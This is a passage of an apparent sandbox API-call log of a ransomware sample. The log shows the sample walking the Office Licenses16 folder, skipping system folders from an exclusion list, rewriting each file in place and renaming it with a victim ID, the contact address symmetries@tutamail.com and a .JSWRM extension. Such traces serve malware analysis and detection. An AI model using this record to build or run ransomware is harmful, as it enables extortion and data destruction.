(HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0102.755] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0102.757] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.757] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0102.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.757] CloseHandle (hObject=0x45c) returned 1 [0102.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0102.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0102.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0102.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0102.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0102.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0102.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.758] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0102.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0102.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0102.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0102.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0102.759] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe330c311, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe330c311, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe35223c3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x516c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExcelR_Retail-ppd.xrm-ms", cAlternateFileName="EX788A~1.XRM")) returned 1 [0102.759] lstrcmpiW (lpString1="ExcelR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0102.759] lstrcmpiW (lpString1="ExcelR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0102.759] lstrcmpiW (lpString1="ExcelR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0102.759] lstrcmpiW (lpString1="ExcelR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0102.759] lstrcmpiW (lpString1="ExcelR_Retail-ppd.xrm-ms", lpString2="recovery") returned -1 [0102.759] lstrcmpiW (lpString1="ExcelR_Retail-ppd.xrm-ms", lpString2="perflogs") returned -1 [0102.759] lstrcmpiW (lpString1="ExcelR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0102.759] lstrcmpiW (lpString1="ExcelR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.759] lstrcmpiW (lpString1="ExcelR_Retail-ppd.xrm-ms", lpString2="system volume information") returned -1 [0102.759] lstrcmpiW (lpString1="ExcelR_Retail-ppd.xrm-ms", lpString2="msocache") returned -1 [0102.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Retail-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0102.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0102.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Retail-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x241178, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0102.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0102.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Retail-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0102.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0102.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Retail-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x2413a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0102.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0102.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0102.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0102.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0102.759] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.760] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20844) returned 1 [0102.760] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5160) returned 0x24c1d0 [0102.760] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5160, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5160, lpOverlapped=0x0) returned 1 [0102.763] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.763] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5160, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5160, lpOverlapped=0x0) returned 1 [0102.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.763] CloseHandle (hObject=0x45c) returned 1 [0102.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0102.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0102.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0102.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0102.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0102.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0102.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.764] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0102.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0102.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0102.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0102.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0102.765] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3299b47, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3299b47, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3358711, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d36, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExcelR_Retail-ul-oob.xrm-ms", cAlternateFileName="EX9957~1.XRM")) returned 1 [0102.765] lstrcmpiW (lpString1="ExcelR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0102.765] lstrcmpiW (lpString1="ExcelR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0102.765] lstrcmpiW (lpString1="ExcelR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0102.765] lstrcmpiW (lpString1="ExcelR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0102.765] lstrcmpiW (lpString1="ExcelR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0102.765] lstrcmpiW (lpString1="ExcelR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0102.765] lstrcmpiW (lpString1="ExcelR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0102.765] lstrcmpiW (lpString1="ExcelR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.765] lstrcmpiW (lpString1="ExcelR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0102.765] lstrcmpiW (lpString1="ExcelR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0102.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Retail-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0102.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0102.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Retail-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241010, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0102.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Retail-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0102.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0102.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Retail-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241358, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0102.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0102.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0102.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0102.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.766] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11574) returned 1 [0102.766] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d30) returned 0x24c1d0 [0102.766] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d30, lpOverlapped=0x0) returned 1 [0102.769] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.769] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d30, lpOverlapped=0x0) returned 1 [0102.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.769] CloseHandle (hObject=0x45c) returned 1 [0102.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0102.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0102.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0102.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0102.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0102.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0102.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.770] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0102.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0102.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0102.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0102.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0102.771] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3201264, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3201264, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe32e60a0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dcf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExcelR_Retail-ul-phn.xrm-ms", cAlternateFileName="EXCELR~4.XRM")) returned 1 [0102.771] lstrcmpiW (lpString1="ExcelR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0102.771] lstrcmpiW (lpString1="ExcelR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0102.771] lstrcmpiW (lpString1="ExcelR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0102.771] lstrcmpiW (lpString1="ExcelR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0102.771] lstrcmpiW (lpString1="ExcelR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0102.771] lstrcmpiW (lpString1="ExcelR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0102.771] lstrcmpiW (lpString1="ExcelR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0102.771] lstrcmpiW (lpString1="ExcelR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.771] lstrcmpiW (lpString1="ExcelR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0102.771] lstrcmpiW (lpString1="ExcelR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned -1 [0102.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0102.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Retail-ul-phn.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0102.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0102.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Retail-ul-phn.xrm-ms", cchWideChar=27, lpMultiByteStr=0x240f48, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0102.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0102.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Retail-ul-phn.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0102.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0102.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Retail-ul-phn.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241358, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0102.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0102.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0102.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0102.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program 